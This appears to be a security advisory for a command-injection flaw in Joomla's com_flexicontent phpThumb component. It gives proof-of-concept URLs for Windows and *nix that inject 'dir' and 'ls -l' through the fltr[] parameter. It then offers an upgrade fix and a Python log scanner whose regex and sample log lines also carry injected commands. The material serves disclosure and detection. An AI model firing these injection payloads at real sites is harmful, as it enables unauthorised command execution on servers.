Joomla com_flexicontent Remote Code Execution Vulnerability

*—-*
*POC:*

*Windows-
/components/com_flexicontent/librairies/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9
-quality 75 -interlace line fail.jpg jpeg:fail.jpg %26%26 dir %26%26
&phpThumbDebug=9

*nix-
/components/com_flexicontent/librairies/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9
-quality 75 -interlace line fail.jpg jpeg:fail.jpg ; ls -l ;
&phpThumbDebug=9

*—-*
*Fix:*

Replace the phpThumb package in use with the latest version.
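Until the library is upgraded, a defender's first question is whether the pattern in the PoC above has already been tried against a site. The following script is an added example written for this post, not code from the advisory authors or the Joomla/phpThumb projects: it parses combined-format access log lines (the sample lines are constructed) and flags requests to phpThumb.php whose fltr[] value contains shell metacharacters. A bare pipe is deliberately not treated as suspicious, because phpThumb's own filter syntax (`blur|9`) uses it; the separators and substitution tokens (`;`, `&&`, `||`, backtick, `$(`) are what let a filter argument escape into the ImageMagick command line.

```python
"""Flag phpThumb fltr[] command-injection attempts in web access logs.

Added example for this advisory (CVE-2010-1598 in the bundled phpThumb of
com_flexicontent); the log format and sample lines below are constructed.
"""
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Shell separators / substitution tokens that have no place in a filter
# argument. A single '|' is excluded on purpose: phpThumb's filter syntax
# itself uses it (e.g. fltr[]=blur|9), so it would cause false positives.
SHELL_METACHARS = re.compile(r"(;|&&|\|\||`|\$\(|\n)")

# Combined log format: ip ident user [time] "METHOD url PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) \S+" (?P<status>\d{3})'
)


def inspect_request(url):
    """Return reasons a request looks like a phpThumb injection, [] if clean."""
    parts = urlsplit(url)
    if not parts.path.lower().endswith("/phpthumb.php"):
        return []
    # parse_qs splits on '&' first, then percent-decodes each value, so an
    # encoded %26%26 inside fltr[] survives as a literal '&&' in the value.
    params = parse_qs(parts.query, keep_blank_values=True)
    reasons = []
    for key, values in params.items():
        if key not in ("fltr[]", "fltr"):
            continue
        for value in values:
            decoded = unquote(value)  # second pass catches double-encoding
            if SHELL_METACHARS.search(decoded):
                reasons.append(f"shell metacharacter in {key}={decoded!r}")
    if reasons and "phpThumbDebug" in params:
        reasons.append("phpThumbDebug parameter also set, as in the PoC")
    return reasons


def scan_log(text):
    """Return (ip, url, reasons) for every suspicious phpThumb request."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons = inspect_request(m.group("url"))
        if reasons:
            hits.append((m.group("ip"), m.group("url"), reasons))
    return hits


# Constructed sample log: one benign phpThumb request, one request shaped
# like the *nix PoC above, one double-encoded variant, one unrelated page.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Apr/2010:13:55:36 +0000] "GET /components/com_flexicontent/librairies/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9 HTTP/1.1" 200 5120
203.0.113.7 - - [10/Apr/2010:13:56:01 +0000] "GET /components/com_flexicontent/librairies/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9+-quality+75+-interlace+line+fail.jpg+jpeg:fail.jpg+%3B+ls+-l+%3B&phpThumbDebug=9 HTTP/1.1" 200 8801
203.0.113.9 - - [10/Apr/2010:13:57:12 +0000] "GET /components/com_flexicontent/librairies/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9+%2526%2526+id HTTP/1.1" 200 8790
203.0.113.11 - - [10/Apr/2010:13:58:40 +0000] "GET /index.php?option=com_flexicontent&view=items HTTP/1.1" 200 20311
"""

if __name__ == "__main__":
    for ip, url, reasons in scan_log(SAMPLE_LOG):
        print(ip, url)
        for reason in reasons:
            print("   ", reason)
```

Running the script prints the two injection-shaped requests (203.0.113.7 and 203.0.113.9) and leaves the legitimate blur request alone. The same `inspect_request` check can be dropped into a WAF rule or a SIEM parser; the part worth keeping is the allow-list view of what a filter argument should contain, rather than a block-list of specific commands.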

*—-*
*References:*
http://www.cvedetails.com/cve/CVE-2010-1598/

*—-*
Warm Regards,
Deepankar Arora and Rafay Baloch
RHA Infosec
